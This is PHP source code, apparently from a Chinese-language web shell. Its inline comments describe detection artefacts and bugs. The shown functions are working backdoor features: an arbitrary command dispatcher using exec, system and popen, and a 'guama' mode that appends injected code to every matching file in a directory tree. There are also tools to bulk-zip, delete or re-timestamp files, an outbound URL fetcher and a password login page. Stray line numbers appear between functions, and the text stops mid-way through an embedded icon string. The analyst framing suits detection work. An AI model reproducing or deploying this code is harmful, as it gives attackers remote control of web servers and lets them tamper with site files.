function do_phpfun($cmd,$fun) {
 // Runs $cmd through the caller-chosen execution function $fun (exec,
 // shell_exec, system, passthru or popen) and returns the captured output; an
 // unknown $fun yields ''. This is the shell's explicit command dispatcher, so
 // the same disable_functions / process-tree detection points as Exec_Run()
 // apply. The popen case calls pclose($f) even when popen() failed and $f is false.
 $res = '';
 switch($fun){
 case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
 case "shell_exec": $res = @shell_exec($cmd); break;
 case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
 case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
 case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);break;
 }
 return $res;
}
1738
1739
1740
1741
1742
function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
 // Walks $dir (recursing into subdirectories when $bool is set), skips the
 // shell's own path, and applies one bulk operation per entry chosen by $type:
 //   guama    - append "\n".$code to every file whose path matches
 //              debug($files,$filetype): mass code injection across a tree; the
 //              burst of appends to otherwise static files is the artefact
 //   qingma   - strip every occurrence of $code from files that contain it
 //   tihuan   - replace $code with $filetype in files that contain it
 //   scanfile - link to files whose basename contains $code
 //   scancode - link to files whose contents contain $code
 //   scanphp  - for files whose extension is $code, link edit/delete when
 //              muma() flags their contents
 // Each action reports per file through html_n()/html_a(). Note that a
 // directory entry is still handed to the non-recursive branch when $bool is
 // false, and every candidate is read whole with file_get_contents().
 $show = do_show($dir);
 foreach($show as $files){
 if(is_dir($files) && $bool){
 do_passreturn($files,$code,$type,$bool,$filetype,$shell);
 }else{
 if($files == $shell) continue;
 switch($type){
 case "guama":
 if(debug($files,$filetype)){
 do_write($files,"ab","\n".$code) ? html_n("成功--> $files<br>") : html_n("失败--> $files<br>");
 }
 break;
 case "qingma":
 $filecode = @file_get_contents($files);
 if(stristr($filecode,$code)){
 $newcode = str_replace($code,'',$filecode);
 do_write($files,"wb",$newcode) ? html_n("成功--> $files<br>") : html_n("失败--> $files<br>");
 }
 break;
 case "tihuan":
 $filecode = @file_get_contents($files);
 if(stristr($filecode,$code)){
 $newcode = str_replace($code,$filetype,$filecode);
 do_write($files,"wb",$newcode) ? html_n("成功--> $files<br>") : html_n("失败--> $files<br>");
 }
 break;
 case "scanfile":
 $file = explode('/',$files);
 if(stristr($file[count($file)-1],$code)){
 html_a("?eanver=editr&p=$files",$files);
 echo '<br>';
 }
 break;
 case "scancode":
 $filecode = @file_get_contents($files);
 if(stristr($filecode,$code)){
 html_a("?eanver=editr&p=$files",$files);
 echo '<br>';
 }
 break;
 case "scanphp":
 $fileinfo = pathinfo($files);
 if($fileinfo['extension'] == $code){
 $filecode = @file_get_contents($files);
 if(muma($filecode,$code)){
 html_a("?eanver=editr&p=".urlencode($files),"编辑");
 html_a("?eanver=del&p=".urlencode($files),"删除");
 echo $files.'<br>';
 }
 }
 break;
 }
 }
 }
}
1799
1800
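class PHPzip{
    // Minimal streaming ZIP writer. startfile() opens the output; addfile() and
    // adddir() write a local-header + data record straight to the handle and queue
    // the matching central-directory record in $dirstr; createfile() appends the
    // central directory plus the end-of-central-directory record and closes the
    // file.

    public $file_count = 0;   // records written so far (files and directories)
    public $datastr_len = 0;  // bytes written so far, i.e. offset of the next local header
    public $dirstr_len = 0;   // accumulated size of the central directory
    public $filedata = '';    // unused; kept so existing code touching it still works
    public $gzfilename;       // output path handed to startfile()
    public $fp;               // output handle, or false after a failed startfile()
    public $dirstr = '';      // queued central-directory records

    // Pack a unix timestamp (0 = now) into the 32-bit MS-DOS date/time layout used
    // by ZIP headers. Dates before 1980 clamp to 1980-01-01 00:00:00 because the
    // format cannot represent them.
    function unix2DosTime($unixtime = 0) {
        $t = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($t['year'] < 1980) {
            $t = array('year' => 1980, 'mon' => 1, 'mday' => 1,
                       'hours' => 0, 'minutes' => 0, 'seconds' => 0);
        }
        return (($t['year'] - 1980) << 25) | ($t['mon'] << 21) | ($t['mday'] << 16) |
               ($t['hours'] << 11) | ($t['minutes'] << 5) | ($t['seconds'] >> 1);
    }

    // Create the parent directories of $path if needed and open it for writing.
    // Returns true on success, false when the file could not be opened.
    function startfile($path = "web.zip"){
        $this->gzfilename = $path;
        $parent = dirname($path);
        // The original climbed dirname() until it saw "." and therefore never
        // terminated for absolute paths (dirname('/') is '/'); a recursive mkdir()
        // creates the same directories without the loop.
        if ($parent !== '' && $parent !== '.' && !is_dir($parent)) {
            @mkdir($parent, 0777, true);
        }
        $this->fp = @fopen($this->gzfilename, "w");
        return $this->fp !== false;
    }

    // Add a deflate-compressed file record named $name holding $data. A $name
    // ending in "/" is delegated to adddir(). Returns false if startfile() has not
    // succeeded.
    function addfile($data, $name){
        $name = str_replace('\\', '/', $name);
        if (strrchr($name, '/') == '/') return $this->adddir($name);
        if (!$this->fp) return false;

        // Little-endian DOS timestamp. The original built this by eval()ing a
        // "\x.." string assembled from dechex() digits, which also broke whenever
        // dechex() returned fewer than eight characters.
        $dostime = pack('V', $this->unix2DosTime());
        $unc_len = strlen($data);
        $crc = crc32($data);
        // gzcompress() yields a zlib stream; drop its 2-byte header and 4-byte
        // Adler-32 trailer to get the raw deflate data ZIP expects. The compressed
        // size must be measured after stripping — the original measured before, so
        // every record over-stated it by six bytes.
        $zdata = substr(gzcompress($data), 2, -4);
        $c_len = strlen($zdata);
        $sizes = pack('VVV', $crc, $c_len, $unc_len);   // crc32, compressed, uncompressed

        // Local file header, data, and the trailing descriptor the original wrote.
        $datastr = "\x50\x4b\x03\x04"
                 . "\x14\x00"                 // version needed to extract: 2.0
                 . "\x00\x00"                 // general purpose flags
                 . "\x08\x00"                 // compression method: deflate
                 . $dostime
                 . $sizes
                 . pack('v', strlen($name))
                 . pack('v', 0)               // extra field length
                 . $name
                 . $zdata
                 . $sizes;
        fwrite($this->fp, $datastr);
        $written = strlen($datastr);

        // Central-directory record pointing at the local header just written.
        $dirstr = "\x50\x4b\x01\x02"
                . "\x00\x00"                  // version made by
                . "\x14\x00"                  // version needed to extract
                . "\x00\x00"                  // general purpose flags
                . "\x08\x00"                  // compression method: deflate
                . $dostime
                . $sizes
                . pack('v', strlen($name))
                . pack('vvvv', 0, 0, 0, 0)    // extra, comment, disk number, internal attrs
                . pack('V', 32)               // external attrs: archive bit
                . pack('V', $this->datastr_len)  // offset of the local header
                . $name;
        $this->dirstr .= $dirstr;

        $this->file_count++;
        $this->dirstr_len += strlen($dirstr);
        $this->datastr_len += $written;
        return true;
    }

    // Add a directory record for $name (stored, zero length, zero timestamp).
    // Returns false if startfile() has not succeeded.
    function adddir($name){
        if (!$this->fp) return false;
        $name = str_replace("\\", "/", $name);
        $empty = pack('VVV', 0, 0, 0);   // crc32, compressed, uncompressed: all zero

        $datastr = "\x50\x4b\x03\x04"
                 . "\x0a\x00"                 // version needed to extract: 1.0
                 . "\x00\x00"                 // general purpose flags
                 . "\x00\x00"                 // compression method: stored
                 . "\x00\x00\x00\x00"         // timestamp (none)
                 . $empty
                 . pack('v', strlen($name))
                 . pack('v', 0)               // extra field length
                 . $name
                 . $empty;                    // trailing descriptor, as the original wrote
        fwrite($this->fp, $datastr);
        $written = strlen($datastr);

        $dirstr = "\x50\x4b\x01\x02"
                . "\x00\x00"                  // version made by
                . "\x0a\x00"                  // version needed to extract: 1.0
                . "\x00\x00"                  // general purpose flags
                . "\x00\x00"                  // compression method: stored
                . "\x00\x00\x00\x00"          // timestamp (none)
                . $empty
                . pack('v', strlen($name))
                . pack('vvvv', 0, 0, 0, 0)    // extra, comment, disk number, internal attrs
                . pack('V', 16)               // external attrs: directory bit
                . pack('V', $this->datastr_len)  // offset of the local header
                . $name;
        $this->dirstr .= $dirstr;

        $this->file_count++;
        $this->dirstr_len += strlen($dirstr);
        $this->datastr_len += $written;
        return true;
    }

    // Write the central directory and the end-of-central-directory record, then
    // close the output. Returns false if startfile() has not succeeded.
    function createfile(){
        if (!$this->fp) return false;
        $endstr = "\x50\x4b\x05\x06"
                . "\x00\x00\x00\x00"          // this disk / disk holding the central directory
                . pack('vv', $this->file_count, $this->file_count)
                . pack('V', $this->dirstr_len)
                . pack('V', $this->datastr_len)   // offset of the central directory
                . "\x00\x00";                 // comment length
        fwrite($this->fp, $this->dirstr . $endstr);
        fclose($this->fp);
        $this->fp = false;
        return true;
    }
}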
1945
function File_Act($array,$actall,$inver,$REAL_DIR)
{
 // Bulk file operation on the selected paths in $array, chosen by $actall:
 //   'e' zip everything into $inver; 'a' copy into directory $inver; 'b' delete;
 //   'c' chmod to the four-digit octal $inver; 'd' set mtime to strtotime($inver).
 // Returns a status string for the page. Problems visible below:
 //  - listfiles()/num_bitunit() are declared inside the 'e' branch, so a second
 //    'e' call in the same request is a fatal redeclaration;
 //  - listfiles() puts an optional parameter before required ones (deprecated
 //    in PHP 8.0);
 //  - eregi() in case 'c' was removed in PHP 7;
 //  - case 'b' chmod()s $filename, which is only assigned in case 'a';
 //  - array_pop(explode(...)) passes a temporary by reference (notice, and a
 //    fatal "only variables" error on PHP 8).
 if(($count = count($array)) == 0) return '请选择文件';
 if($actall == 'e')
 {
 // Recursively add $mydir.$dir (a file or directory) to $faisunZIP, skipping the
 // archive itself; returns the number of files added. An empty directory is
 // recorded as a directory entry.
 function listfiles($dir=".",$faisunZIP,$mydir){
 $sub_file_num = 0;
 if(is_file($mydir."$dir")){
 if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir")){
 $faisunZIP -> addfile(file_get_contents($mydir.$dir),"$dir");
 return 1;
 }
 return 0;
 }

 $handle=opendir($mydir."$dir");
 while ($file = readdir($handle)) {
 if($file=="."||$file=="..")continue;
 if(is_dir($mydir."$dir/$file")){
 $sub_file_num += listfiles("$dir/$file",$faisunZIP,$mydir);
 }
 else {
 if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir/$file")){
 $faisunZIP -> addfile(file_get_contents($mydir.$dir."/".$file),"$dir/$file");
 $sub_file_num ++;
 }
 }
 }
 closedir($handle);
 if(!$sub_file_num) $faisunZIP -> addfile("","$dir/");
 return $sub_file_num;
 }

 // Format $num as B/KB/MB/GB, rounding up to two decimals; the loop keeps the
 // last unit whose threshold $num clears.
 function num_bitunit($num){
 $bitunit=array(' B',' KB',' MB',' GB');
 for($key=0;$key<count($bitunit);$key++){
 if($num>=pow(2,10*$key)-1){ //1023B is shown as 1KB
 $num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
 }
 }
 return $num_bitunit_str;
 }

 $mydir=$REAL_DIR.'/';
 if(is_array($array)){
 $faisunZIP = new PHPzip;
 if($faisunZIP -> startfile("$inver")){
 $filenum = 0;
 foreach($array as $file){
 $filenum += listfiles($file,$faisunZIP,$mydir);
 }
 $faisunZIP -> createfile();
 return "压缩完成,共添加 $filenum 个文件.<br><a href='$inver'>点击下载 $inver (".num_bitunit(filesize("$inver")).")</a>";
 }else{
 return "$inver 不能写入,请检查路径或权限是否正确.<br>";
 }
 }else{
 return "没有选择的文件或目录.<br>";
 }


 }
 $i = 0;
 while($i < $count)
 {
 $array[$i] = urldecode($array[$i]);
 switch($actall)
 {
 case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录'; break;
 case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除'; break;
 case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$inver; break;
 case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$inver; break;
 }
 $i++;
 }
 return '所选文件'.$msg.'完毕';
}
2023
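function start_unzip($tmp_name,$new_name,$todir='zipfile'){
    // Extract the archive at $tmp_name into $todir and print a link to that
    // directory. $new_name is unused but kept for the existing call signature.
    // Returns false when the archive cannot be opened — the original printed the
    // error but still called extractTo()/close() on the unopened object.
    $zip = new ZipArchive();
    if ($zip->open($tmp_name) !== TRUE) {
        echo '抱歉!压缩包无法打开或损坏';
        return false;
    }
    $zip->extractTo($todir);
    $zip->close();
    echo '解压完毕! <a href="?eanver=main&path='.urlencode($todir).'">进入解压目录</a> <a href="javascript:history.go(-1);">返回</a>';
    return true;
}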
2033
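function muma($filecode,$filetype){
    // Signature scan used by the "scanphp" action: true when $filecode contains
    // any of the marker strings for $filetype (case-insensitive), false otherwise
    // — including for file types with no marker list and for a non-string
    // $filecode (a failed file_get_contents()), where the original iterated null
    // and fell off the end returning null.
    static $dim = array(
        "php" => array("eval(","exec("),
        "asp" => array("WScript.Shell","execute(","createtextfile("),
        "aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),
        "jsp" => array("runtime.exec(")
    );
    if (!isset($dim[$filetype]) || !is_string($filecode)) return false;
    foreach ($dim[$filetype] as $marker) {
        if (stristr($filecode, $marker) !== false) return true;
    }
    return false;
}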
2045
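function debug($file,$ftype){
    // Filename filter: true when $file contains any of the "|"-separated
    // substrings in $ftype (case-insensitive), false otherwise. Empty needles are
    // ignored — the original let a trailing "|" match every file on PHP 8, where
    // stristr($s, '') returns the whole string.
    foreach (explode('|', (string)$ftype) as $needle) {
        if ($needle !== '' && stristr($file, $needle) !== false) return true;
    }
    return false;
}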
2052
2053/*---string---*/
2054
function str_path($path){
    // Collapse "//" to "/" in a single left-to-right pass (so "///" becomes "//").
    return strtr($path, array('//' => '/'));
}
2058
function msg($msg){
    // Abort the request with a JS alert showing $msg, then history.go(-1).
    $script = "<script>window.alert('" . $msg . "');history.go(-1);</script>";
    die($script);
}
2062
function uppath($nowpath){
    // URL-encoded parent directory of $nowpath, with backslashes normalised to "/".
    $parent = dirname($nowpath);
    return urlencode(strtr($parent, '\\', '/'));
}
2067
function xxstr($key){
    // Normalise backslash escaping: collapse doubled backslashes first, then
    // double every remaining one, so each backslash ends up doubled exactly once.
    $single = str_replace("\\\\", "\\", $key);
    return addcslashes($single, "\\");
}
2073
2074/*---html---*/
2075
function html_ta($url,$name){
    // Emit a link to $url labelled $name that opens in a new tab.
    html_n(sprintf('<a href="%s" target="_blank">%s</a>', $url, $name));
}
2079
function html_a($url,$name,$where=''){
    // Emit a link to $url labelled $name, with $where inserted as extra attributes.
    html_n(sprintf('<a href="%s" %s>%s</a> ', $url, $where, $name));
}
2083
function html_img($url){
    // Emit an icon served by this script's ?img= handler.
    html_n(sprintf('<img src="?img=%s" border=0>', $url));
}
2087
function back(){
    // Emit a "back" button that calls history.back().
    $label = '返回';
    html_n("<input type='button' value='$label' onclick='history.back();'>");
}
2091
function html_radio($namei,$namet,$v1,$v2){
    // Two radio buttons sharing the name "return": $v1 (pre-checked, labelled
    // $namei) and $v2 (labelled $namet), followed by two line breaks.
    $first = sprintf('<input type="radio" name="return" value="%s" checked>%s', $v1, $namei);
    $second = sprintf('<input type="radio" name="return" value="%s">%s<br><br>', $v2, $namet);
    html_n($first);
    html_n($second);
}
2096
function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
    // Emit an <input>. With $mode set it is rendered "checked" with $text after
    // it; otherwise $text precedes the field.
    $attrs = sprintf('type="%s" name="%s" value="%s" size="%s"', $type, $name, $value, $size);
    if ($mode) {
        html_n("<input $attrs checked>$text");
        return;
    }
    html_n("$text <input $attrs>");
}
2104
function html_base(){
// Emit three client-side JavaScript helpers used by the UI's forms:
// base64encode() (byte-wise Base64 of a string), utf16to8() (JS string to a
// UTF-8 byte string) and utf8to16() (the inverse). The whole body is one literal
// handed to html_n(); nothing in it is interpolated.
html_n('function base64encode(str){
 var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
 var out, i, len;
 var c1, c2, c3;
 len = str.length;
 i = 0;
 out = "";
 while (i < len) {
 c1 = str.charCodeAt(i++) & 0xff;
 if (i == len) {
 out += base64EncodeChars.charAt(c1 >> 2);
 out += base64EncodeChars.charAt((c1 & 0x3) << 4);
 out += "==";
 break;
 }
 c2 = str.charCodeAt(i++);
 if (i == len) {
 out += base64EncodeChars.charAt(c1 >> 2);
 out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
 out += base64EncodeChars.charAt((c2 & 0xF) << 2);
 out += "=";
 break;
 }
 c3 = str.charCodeAt(i++);
 out += base64EncodeChars.charAt(c1 >> 2);
 out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
 out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
 out += base64EncodeChars.charAt(c3 & 0x3F);
 }
 return out;
}
function utf16to8(str) {
var out, i, len, c;
out = "";
len = str.length;
for(i = 0; i < len; i++) {
c = str.charCodeAt(i);
if ((c >= 0x0001) && (c <= 0x007F)) {
out += str.charAt(i);
} else if (c > 0x07FF) {
out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
} else {
out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
}
}
return out;
}
function utf8to16(str) {
 var out, i, len, c;
 var char2, char3;
 out = "";
 len = str.length;
 i = 0;
 while(i < len) {
 c = str.charCodeAt(i++);
 switch(c >> 4) {
 case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
 out += str.charAt(i-1);
 break;
 case 12: case 13:
 char2 = str.charCodeAt(i++);
 out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
 break;
 case 14:
 char2 = str.charCodeAt(i++);
 char3 = str.charCodeAt(i++);
 out += String.fromCharCode(((c & 0x0F) << 12) |
 ((char2 & 0x3F) << 6) |
 ((char3 & 0x3F) << 0));
 break;
 }
 }
 return out;
}
');
}
2185
function html_text($name,$cols,$rows,$value = ''){
    // Emit a <textarea> named $name of $cols x $rows, pre-filled with $value.
    html_n(sprintf('<br><br><textarea name="%s" COLS="%s" ROWS="%s" >%s</textarea>', $name, $cols, $rows, $value));
}
2189
function html_select($array,$mode = '',$change = '',$name = 'class'){
    // Emit a <select> named $name (with extra attributes $change) whose options
    // are $array's key => label pairs; the option whose key equals $mode is
    // pre-selected.
    html_n("<select name=$name $change>");
    foreach ($array as $key => $label) {
        $selected = ($key == $mode) ? ' selected' : '';
        html_n("<option value=\"$key\"$selected>$label</option>");
    }
    html_n("</select>");
}
2201
function html_font($color,$size,$name){
    // Emit $name wrapped in a <font> tag with the given colour and size.
    html_n(sprintf('<font color="%s" size="%s">%s</font>', $color, $size, $name));
}
2205
function GetHtml($url)
{
 // Fetch $url over plain HTTP and return the body, trying a raw fsockopen GET,
 // then cURL, then file_get_contents(), in that order; when all three come back
 // empty it prints a JavaScript snippet that makes the viewer's browser request
 // $url instead, and returns null. This is the shell's generic outbound-fetch
 // helper: the outbound connection itself and the fixed MSIE 6.0 User-Agent are
 // the observables. Caveats visible here: $contents is never initialised, "?" is
 // appended even when the URL has no query, the request line is "GET //path"
 // because $link['path'] already starts with "/", and a response without a blank
 // header/body separator is returned as ''.
 $c = '';
 $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
 if(function_exists('fsockopen')){
 $link = parse_url($url);
 $query=$link['path'].'?'.$link['query'];
 $host=strtolower($link['host']);
 $port=$link['port'];
 if($port==""){$port=80;}
 $fp = fsockopen ($host,$port, $errno, $errstr, 10);
 if ($fp)
 {
 $out = "GET /{$query} HTTP/1.0\r\n";
 $out .= "Host: {$host}\r\n";
 $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
 $out .= "Connection: Close\r\n\r\n";
 fwrite($fp, $out);
 $inheader=1;
 while(!feof($fp))
 {$line=fgets($fp,4096);
 if($inheader==0){$contents.=$line;}
 if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
 }
 fclose ($fp);
 $c= $contents;
 }
 }
 if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $url);
 curl_setopt($ch, CURLOPT_TIMEOUT, 15);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
 $c = curl_exec($ch);
 curl_close($ch);
 }
 if(empty($c) && ini_get('allow_url_fopen')){
 $c = file_get_contents($url);
 }
 // Last resort: have the viewing browser fetch the URL itself.
 if(empty($c)){
 echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');";
 }
 if(!empty($c))
 {
 return $c;
 }
 }
2254
function html_main()
{
    // Emit the frameset page: a title bar showing safe_mode state, server IP,
    // OS, server software and uname, above two iframes (?eanver=left and
    // ?eanver=main). Extra arguments passed by the dispatcher are ignored.
    $safeMode = @ini_get("safe_mode");
    $hsafemode = ($safeMode || strtolower($safeMode) == "on") ? "ON (开启)" : "OFF (关闭)";
    $serverIp = gethostbyname($_SERVER["SERVER_NAME"]);
    $title = $_SERVER["HTTP_HOST"] . "/Manager";
    $banner = sprintf("安全模式:%s-----%s-----%s-----%s-----%s",
        $hsafemode, $serverIp, PHP_OS, $_SERVER["SERVER_SOFTWARE"], php_uname());
    html_n("<html><title>" . $title . "</title><table width='100%'><td align='center'><b>" . $banner . "</b></td></table>");
    html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'></iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'></iframe></td></tr></table></html>");
}
2271
function islogin($shellname,$myurl){
// Print the login page: inline CSS, a link labelled $shellname pointing at
// $myurl, and a POST form with a single "postpass" password field. Neither
// argument is escaped before interpolation into the heredoc. The static markup
// (the "postpass" field name, the IE gradient filter, the scrollbar CSS block)
// is what a content-based detection rule can key on.
print<<<END
<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>
<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='{$myurl}' target='_blank'>{$shellname}</a><br><br><form method='post'>输入密码:<input name='postpass' type='password' size='22'> <input type='submit' value='登录'><br><br><br><font color=#3399FF>请勿用于非法用途,后果作者概不负责!</font><br></div></center>
END;
}
2278
function html_sql(){
    // Render the MySQL login fields (host, port, user, password, database) and
    // the submit button, then close the form opened by the caller.
    $fields = array(
        array("text", "sqlhost", "localhost", "<br>MYSQL地址"),
        array("text", "sqlport", "3306", "<br>MYSQL端口"),
        array("text", "sqluser", "root", "<br>MYSQL用户"),
        array("password", "sqlpass", "", "<br>MYSQL密码"),
        array("text", "sqldb", "dbname", "<br>MYSQL库名"),
    );
    foreach ($fields as $spec) {
        html_input($spec[0], $spec[1], $spec[2], $spec[3], "30");
    }
    html_input("submit", "sqllogin", "登录", "<br>");
    html_n('</form>');
}
2288
function Mysql_Len($data,$len)
{
    // Truncate $data to its first $len bytes followed by "..."; values shorter
    // than $len pass through unchanged (a value of exactly $len bytes is still
    // suffixed).
    $tooLong = strlen($data) >= $len;
    return $tooLong ? substr_replace($data, '...', $len) : $data;
}
2294
function html_n($data){
    // Print $data followed by a newline.
    echo $data, "\n";
}
2298
2299/*---css---*/
2300
function css_img($img){
 // Serve one of the embedded file-type icons (base64-encoded GIFs keyed by the
 // names returned from css_showimg(): exe, dir, txt, html, js, xml, mp3, img,
 // title, rar) and terminate the request. An unrecognised key reads an unset
 // array index (null), so the response body is empty. This is the "?img=" path
 // of the script; it sends an image/gif content type and no other output.
 $images = array(
 "exe"=>
 "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
 "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
 "xhIAOw==",
 "dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".
 "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
 "txt"=>
 "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
 "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
 "UpPWG3Ig6Hq/XmRjuZwkAAA7",
 "html"=>
 "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
 "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
 "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
 "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
 "ADs=",
 "js"=>
 "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
 "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
 "a00AjYYBbc/o9HjNniUAADs=",
 "xml"=>
 "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
 "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
 "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
 "IQA7",
 "mp3"=>
 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
 "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
 "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
 "img"=>
 "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
 "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
 "FxEAOw==",
 "title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".
 "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".
 "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
 "rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
